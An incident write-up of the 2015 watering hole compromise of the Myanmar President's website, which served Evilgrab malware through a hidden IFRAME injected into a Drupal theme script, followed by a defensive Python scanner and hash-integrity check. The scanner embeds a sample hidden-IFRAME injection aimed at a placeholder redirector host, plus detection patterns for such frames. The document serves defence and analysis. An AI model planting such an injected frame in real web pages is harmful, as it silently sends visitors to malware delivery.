Cyber Incident Victim: President of Myanmar
Date: May 2015
Location: Myanmar
Summary
A watering hole attack compromised the President of Myanmar's official website via malicious IFRAME injection into a Drupal theme JavaScript file, delivering the Evilgrab malware to visitors. Threat actors maintained prolonged access to the site, targeting individuals and organizations with political or business interests in the country. Following disclosure, operators migrated content to a new domain lacking the exploit code, suggesting remediation efforts. The campaign leveraged strategic website compromise to harvest information from high-value targets affiliated with Myanmar's governance and international engagements.
Description
On May 12, 2015, Unit 42 identified a watering hole attack targeting the official website of the President of Myanmar, hosted at "www.president-office.gov[.]mm". Threat actors compromised the site by injecting a malicious inline frame (IFRAME) into a JavaScript file used by the Drupal content management system for the site's theme. Because the theme script loads on every page, the attack delivered malware to visitors automatically, without requiring any interaction, and leveraged the website's legitimacy to target individuals in Myanmar, those engaged in political relations with the country, and organizations conducting business there. Evidence indicated the threat actors had maintained unauthorized access to the website since at least November 2014, meaning the compromise persisted for months before detection. The injected code redirected visitors to attacker-controlled infrastructure that handled malware deployment. The primary objective appeared to be intelligence gathering from high-value targets associated with Myanmar's political or economic sectors. Unit 42 reported the compromise to the website operators, prompting immediate takedown of the infected domain.

Following the disclosure, operators migrated official content to a new domain, "www.myanmarpresidentoffice.info", which retained structural and content artifacts from the original site but contained no exploit code, indicating remediation efforts. The delivered malware, identified as Evilgrab (also known as Vidgrab), exhibited information-stealing capabilities consistent with espionage objectives. Analysis revealed the malware's functionality to harvest system information, document files, and credentials from compromised hosts. Threat infrastructure associated with the attack included multiple command-and-control servers and redirector domains designed to obscure operational endpoints. The incident disrupted public access to presidential communications during the remediation period, though no specific data breaches or operational impacts beyond the website compromise were detailed in available reporting. The swift containment through domain migration and code sanitization limited further exposure to the watering hole mechanism.
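The injection pattern described above (an off-site, hidden IFRAME appended to a theme JavaScript file that the CMS serves on every page) is something a site operator can check for directly. The following is an added example written for this page, not code from Unit 42 or from the Drupal project: it scans a theme script for IFRAME tags with off-site or hidden characteristics and compares theme files against a known-good hash manifest. The sample script, the placeholder redirector host and the manifest are constructed for the example.

```python
import hashlib
import re

# Constructed sample: a Drupal theme behaviour script with a hidden IFRAME appended
# at the end, mirroring the injection described above. The host is a placeholder.
THEME_JS = """(function ($) {
  Drupal.behaviors.menuToggle = { attach: function () { $('.menu').show(); } };
})(jQuery);
document.write('<iframe src="http://redirector.example.invalid/in.php" width="0" height="0" style="visibility:hidden"></iframe>');
"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Geometry or style that hides the frame from the visitor: a strong signal of injection.
HIDDEN_HINTS = (
    re.compile(r"\b(width|height)\s*=\s*[\"']?0\b", re.I),
    re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I),
)

def find_injected_iframes(js_source, site_hosts=("president-office.gov.mm",)):
    """Return IFRAME tags found inside a JavaScript file with off-site / hidden flags.
    A theme script has no reason to emit IFRAMEs at all, so every hit is at least medium;
    an off-site src or hidden geometry raises it to high."""
    findings = []
    for m in IFRAME_RE.finditer(js_source):
        tag = m.group(0)
        src = re.search(r"src\s*=\s*[\"']([^\"']+)", tag, re.I)
        host = re.sub(r"^https?://", "", src.group(1)).split("/")[0].lower() if src else ""
        off_site = bool(host) and not any(host.endswith(h) for h in site_hosts)
        hidden = any(p.search(tag) for p in HIDDEN_HINTS)
        findings.append({"tag": tag, "src": src.group(1) if src else None,
                         "off_site": off_site, "hidden": hidden,
                         "severity": "high" if (off_site or hidden) else "medium"})
    return findings

def build_baseline(files):
    """Hash manifest {name: sha256} taken from a known-good copy of the theme."""
    return {n: hashlib.sha256(c.encode()).hexdigest() for n, c in files.items()}

def theme_integrity_drift(files, baseline):
    """Names of theme files whose hash differs from the manifest or is absent from it."""
    current = build_baseline(files)
    return sorted(n for n, d in current.items() if baseline.get(n) != d)

if __name__ == "__main__":
    for f in find_injected_iframes(THEME_JS):
        print(f["severity"], f["src"], "hidden" if f["hidden"] else "visible")
```

Run the integrity check from a cron job or deployment hook against the manifest of the last verified release; a theme file that drifts without a corresponding deployment is the change to inspect first.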
